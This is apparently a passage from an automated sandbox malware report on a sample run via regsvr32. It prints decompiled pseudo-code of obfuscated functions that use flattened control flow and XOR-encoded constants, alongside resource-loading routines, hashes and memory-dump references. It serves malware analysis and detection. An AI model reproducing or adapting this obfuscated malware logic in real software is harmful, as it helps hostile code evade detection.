				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E040DC5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0x40f6224; // 0x0
								_t297 = E040D2194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E040F2B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0x40f6224; // 0x0
					_t286 = E040D2194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}

0x040dfb92
0x040dfb9c
0x040dfba3
0x040dfba5
0x040dfba6
0x040dfba7
0x040dfba8
0x040dfbad
0x040dfbb5
0x040dfbb8
0x040dfbc4
0x040dfbc6
0x040dfbcd
0x040dfbd0
0x040dfbd4
0x040dfbdc
0x040dfbe4
0x040dfbec
0x040dfbf4
0x040dfbfc
0x040dfc04
0x040dfc0c
0x040dfc14
0x040dfc21
0x040dfc25
0x040dfc2d
0x040dfc35
0x040dfc3d
0x040dfc42
0x040dfc47
0x040dfc4f
0x040dfc57
0x040dfc64
0x040dfc68
0x040dfc6d
0x040dfc72
0x040dfc7a
0x040dfc8a
0x040dfc8e
0x040dfc96
0x040dfca3
0x040dfca6
0x040dfcaa
0x040dfcb2
0x040dfcc2
0x040dfcc6
0x040dfcce
0x040dfcd6
0x040dfcde
0x040dfce6
0x040dfceb
0x040dfcf3
0x040dfcfb
0x040dfd03
0x040dfd08
0x040dfd10
0x040dfd18
0x040dfd25
0x040dfd26
0x040dfd30
0x040dfd34
0x040dfd3e
0x040dfd4c
0x040dfd51
0x040dfd57
0x040dfd5f
0x040dfd67
0x040dfd6f
0x040dfd77
0x040dfd7f
0x040dfd87
0x040dfd8f
0x040dfd97
0x040dfd9f
0x040dfdac
0x040dfdaf
0x040dfdb3
0x040dfdbb
0x040dfdc3
0x040dfdcb
0x040dfdd3
0x040dfddb
0x040dfde3
0x040dfdf0
0x040dfdf4
0x040dfdfc
0x040dfe04
0x040dfe10
0x040dfe15
0x040dfe1b
0x040dfe23
0x040dfe2b
0x040dfe38
0x040dfe39
0x040dfe3d
0x040dfe45
0x040dfe4d
0x040dfe55
0x040dfe5d
0x040dfe65
0x040dfe6d
0x040dfe75
0x040dfe7d
0x040dfe85
0x040dfe8a
0x040dfe92
0x040dfe9a
0x040dfea2
0x040dfeaa
0x040dfeb2
0x040dfeba
0x040dfec2
0x040dfed0
0x040dfed4
0x040dfedc
0x040dfee4
0x040dfeec
0x040dfef4
0x040dfefc
0x040dff04
0x040dff0c
0x040dff14
0x040dff1c
0x040dff24
0x040dff31
0x040dff39
0x040dff41
0x040dff41
0x040dff4f
0x040dffed
0x040dffee
0x040dfff6
0x040dfffb
0x040dfffe
0x040e0007
0x040e000d
0x00000000
0x040e000d
0x040dff55
0x040dff5b
0x040dff7c
0x040dffc1
0x040dffc6
0x040dffcd
0x040dffd3
0x00000000
0x040dffd3
0x040dff5d
0x040dff63
0x040e009c
0x040dff69
0x040dff6f
0x00000000
0x040dff75
0x040dff75
0x00000000
0x040dff75
0x040dff6f
0x040dff63
0x040dff5b
0x040e00bb
0x040e00c4
0x040e00c4
0x040e001b
0x040e0065
0x040e006a
0x040e0071
0x040e00ae
0x040e00b0
0x040e00b8
0x040e0073
0x040e0073
0x00000000
0x040e0073
0x00000000
0x040e0078
0x040e0078
0x00000000

Strings

] , xrefs: 040DFEC2
L, xrefs: 040DFE1B
wh=u, xrefs: 040DFDB3
Wx, xrefs: 040DFE6D
Gm, xrefs: 040DFCEB

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Gm$L$Wx$] $wh=u
API String ID: 0-1494249286
Opcode ID: af9aae0c297595fdacaf88d80833f3c0c79e8d97789db637fb872093c9a2386c
Instruction ID: 5bf89a4b0bb46f74a40d031d74059c5cea3c621259df6c71850e3a76f9f77922
Opcode Fuzzy Hash: af9aae0c297595fdacaf88d80833f3c0c79e8d97789db637fb872093c9a2386c
Instruction Fuzzy Hash: A2D11D724093819FD368CF66C88991BFBE1FB89748F10891DF29696260D7B29949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 040E8D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040E8D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x40f6208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E040DC5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x40f6208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E040E0EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E040F36AA);
								_t155 =  *0x40f6208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E040D48DD(_v32, _v48, _v52);
					_t155 =  *0x40f6208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x040e8d3d
0x040e8d40
0x040e8d47
0x040e8d4f
0x040e8d57
0x040e8d5f
0x040e8d67
0x040e8d6f
0x040e8d77
0x040e8d7f
0x040e8d84
0x040e8d8c
0x040e8d94
0x040e8d99
0x040e8dab
0x040e8db5
0x040e8db9
0x040e8dbb
0x040e8dc3
0x040e8dd1
0x040e8dd6
0x040e8dda
0x040e8de2
0x040e8dea
0x040e8df2
0x040e8dfa
0x040e8dff
0x040e8e07
0x040e8e0f
0x040e8e17
0x040e8e22
0x040e8e27
0x040e8e31
0x040e8e36
0x040e8e3a
0x040e8e42
0x040e8e4a
0x040e8e52
0x040e8e5a
0x040e8e5f
0x040e8e67
0x040e8e6f
0x040e8e7f
0x040e8e85
0x040e8e8d
0x040e8e95
0x040e8e9d
0x040e8ea1
0x040e8ea2
0x040e8ea4
0x040e8ea8
0x040e8eb0
0x040e8eb5
0x040e8ebd
0x040e8ec5
0x040e8ecd
0x040e8ed5
0x040e8ee2
0x040e8eef
0x040e8ef7
0x040e8eff
0x040e8f07
0x040e8f0d
0x040e8f0d
0x040e8f13
0x040e8f66
0x040e8f67
0x040e8f6f
0x040e8f71
0x040e8f74
0x040e8f7a
0x00000000
0x040e8f15
0x040e8f17
0x00000000
0x040e8f1d
0x040e8f37
0x040e8f3c
0x040e8f45
0x040e8f45
0x040e8f17
0x040e8f48
0x040e8f55
0x040e8f55
0x040e8f85
0x040e8f8d
0x040e8f92
0x040e8f98
0x040e8f9b
0x040e8f9d
0x040e8fa0
0x040e8fa0
0x00000000

Strings

|Y+, xrefs: 040E8D4F
7S, xrefs: 040E8E4A
#, xrefs: 040E8E85
^M, xrefs: 040E8EC5
_, xrefs: 040E8EB5

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: c3b95eeecd40b0ae4cd6f9de60a4209155ef957d56aeebf04561fbb661865bc3
Instruction ID: acee5c47f6106de6032804f8eb916c38c4408a6579f517021ad05952f10c7386
Opcode Fuzzy Hash: c3b95eeecd40b0ae4cd6f9de60a4209155ef957d56aeebf04561fbb661865bc3
Instruction Fuzzy Hash: 525167725087419FD348DF25D48951BBBE1FBC8768F008A1DF099A6260D3B9DA49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x100126fd
0x100126ff
0x10012701
0x10012705
0x10012707
0x1001273c
0x10012746
0x10012748
0x1001274f
0x1001274f
0x00000000
0x10012755
0x1001270e
0x1001271b
0x10012723
0x00000000
0x00000000
0x10012727
0x1001272d
0x10012731
0x1001273a
0x00000000
0x1001273a
0x1001275b

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF59, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FF59(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E10012862(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E1000A7CE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000ff5c
0x1000ff68
0x1000ffb0
0x1000ffb2
0x1000ffb9
0x00000000
0x1000ffbb
0x1000ff6f
0x1000ff73
0x00000000
0x00000000
0x1000ff75
0x1000ff82
0x00000000
0x1000ff96
0x1000ffa5
0x00000000
0x1000ffad

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetKeyState.USER32 ref: 1000FF7D
GetKeyState.USER32 ref: 1000FF86
GetKeyState.USER32 ref: 1000FF8F
SendMessageA.USER32 ref: 1000FFA5

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271

Uniqueness

Uniqueness Score: -1.00%

Function 040E437A, Relevance: 5.4, Strings: 4, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E040E437A(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				intOrPtr _v168;
				char _v228;
				short _v772;
				short _v774;
				char _v776;
				signed int _v820;
				char _v1340;
				char _v1860;
				void* _t400;
				signed int _t441;
				signed int _t445;
				intOrPtr _t447;
				intOrPtr _t458;
				void* _t460;
				void* _t508;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				intOrPtr* _t534;
				void* _t537;
				void* _t538;

				_t458 = _a24;
				_push(_t458);
				_push(_a20);
				_t534 = __ecx;
				_push(_a16);
				_v156 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t400);
				_v152 = 0x1ee029;
				_t538 = _t537 + 0x20;
				_t460 = 0xf0aa094;
				_t519 = 0x59;
				_v152 = _v152 * 0x53;
				_v152 = _v152 ^ 0x0a02ad5b;
				_v120 = 0x2e5311;
				_v120 = _v120 ^ 0xe660d2f8;
				_v120 = _v120 ^ 0xe649fc28;
				_v80 = 0x91358;
				_v80 = _v80 * 0x29;
				_v80 = _v80 | 0x1917a6d7;
				_v80 = _v80 ^ 0x197ed78c;
				_v96 = 0x864d8a;
				_v96 = _v96 * 0x68;
				_v96 = _v96 / _t519;
				_v96 = _v96 ^ 0x00977d81;
				_v104 = 0x73430f;
				_t520 = 0x22;
				_v104 = _v104 / _t520;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x01b21e30;
				_v128 = 0x2ef155;
				_t521 = 0xc;
				_v128 = _v128 / _t521;
				_v128 = _v128 ^ 0x0005732d;
				_v12 = 0x61311f;
				_t522 = 0x51;
				_v12 = _v12 / _t522;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x00018224;
				_v112 = 0x2a9ecd;
				_v112 = _v112 << 8;
				_v112 = _v112 + 0x4b18;
				_v112 = _v112 ^ 0x2a91adfb;
				_v44 = 0x8c67a3;
				_v44 = _v44 + 0xbf2c;
				_t523 = 0x1a;
				_v44 = _v44 / _t523;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x56d2d87d;
				_v20 = 0xb2272e;
				_t524 = 0x6b;
				_v20 = _v20 / _t524;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xffffd823;
				_v20 = _v20 ^ 0x003105de;
				_v144 = 0x2b3b33;
				_t525 = 0x2b;
				_v144 = _v144 * 0x23;
				_v144 = _v144 ^ 0x05e29440;
				_v52 = 0xfb7274;
				_v52 = _v52 + 0xffff2a15;
				_v52 = _v52 + 0xffff332b;
				_v52 = _v52 >> 9;
				_v52 = _v52 ^ 0x000fdf14;
				_v88 = 0xc646f0;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0xffff0542;
				_v88 = _v88 ^ 0x0060230d;
				_v136 = 0x21355;
				_v136 = _v136 + 0x6ddd;
				_v136 = _v136 ^ 0x000c09c4;
				_v148 = 0xba736e;
				_v148 = _v148 + 0xffff584e;
				_v148 = _v148 ^ 0x00bc780c;
				_v72 = 0xf06361;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0xd5eeb61d;
				_v72 = _v72 ^ 0xd5e3ba03;
				_v68 = 0x39c1e1;
				_v68 = _v68 / _t525;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x157dcab9;
				_v28 = 0x7b1c58;
				_v28 = _v28 + 0x44f9;
				_v28 = _v28 + 0xe0d1;
				_v28 = _v28 | 0x2c17f99e;
				_v28 = _v28 ^ 0x2c795b23;
				_v8 = 0x6811e0;
				_t526 = 0x7d;
				_v8 = _v8 / _t526;
				_t527 = 0x6c;
				_v8 = _v8 / _t527;
				_t528 = 6;
				_v8 = _v8 / _t528;
				_v8 = _v8 ^ 0x00012ce9;
				_v84 = 0x1c9c1b;
				_v84 = _v84 ^ 0x05ddd281;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x002853b0;
				_v76 = 0xb1555b;
				_v76 = _v76 << 7;
				_v76 = _v76 * 0x47;
				_v76 = _v76 ^ 0x9758833c;
				_v36 = 0x114b6d;
				_v36 = _v36 ^ 0x431dffba;
				_v36 = _v36 >> 3;
				_v36 = _v36 + 0x181d;
				_v36 = _v36 ^ 0x086a5704;
				_v60 = 0xa17b63;
				_v60 = _v60 ^ 0x190e6497;
				_v60 = _v60 ^ 0xa9f7cd41;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0xb1a3277b;
				_v24 = 0xc713d;
				_v24 = _v24 + 0xc399;
				_v24 = _v24 << 4;
				_v24 = _v24 + 0xfffffd24;
				_v24 = _v24 ^ 0x00d339a4;
				_v16 = 0xef5337;
				_t529 = 0x2b;
				_v16 = _v16 / _t529;
				_v16 = _v16 | 0x2bad32d2;
				_v16 = _v16 + 0xfffffea2;
				_v16 = _v16 ^ 0x2bafb8a8;
				_v100 = 0x51ad29;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x8b9fc663;
				_v100 = _v100 ^ 0xbe3a4459;
				_v92 = 0x2bdd9f;
				_t530 = 0x14;
				_v92 = _v92 / _t530;
				_v92 = _v92 + 0xffff92be;
				_v92 = _v92 ^ 0x000ebd35;
				_v140 = 0x9e48cc;
				_v140 = _v140 << 0xd;
				_v140 = _v140 ^ 0xc915160c;
				_v108 = 0xd84d8a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x0004338e;
				_v40 = 0xc226eb;
				_v40 = _v40 << 2;
				_v40 = _v40 + 0xfffff267;
				_v40 = _v40 << 0x10;
				_v40 = _v40 ^ 0x8e1c4dbd;
				_v32 = 0xa8fcf7;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 / _t530;
				_t531 = 0x59;
				_v32 = _v32 * 0x62;
				_v32 = _v32 ^ 0x9808cd5a;
				_v56 = 0xfa54e1;
				_v56 = _v56 + 0xffff7ead;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t531;
				_v56 = _v56 ^ 0x00b2c623;
				_v132 = 0x7ed953;
				_v132 = _v132 ^ 0x188046ff;
				_v132 = _v132 ^ 0x18f64c45;
				_v124 = 0x5f3094;
